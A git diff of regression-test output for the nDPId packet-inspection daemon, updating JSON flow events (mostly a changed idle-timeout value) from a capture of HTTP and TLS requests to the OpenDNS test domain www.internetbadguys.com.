-00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":6587,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":4,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1569579417280} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/memcached.cap.out b/test/results/memcached.cap.out index 9b6d3302b..05cc9bfdf 100644 --- a/test/results/memcached.cap.out +++ b/test/results/memcached.cap.out @@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"memcached.cap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534343745954} 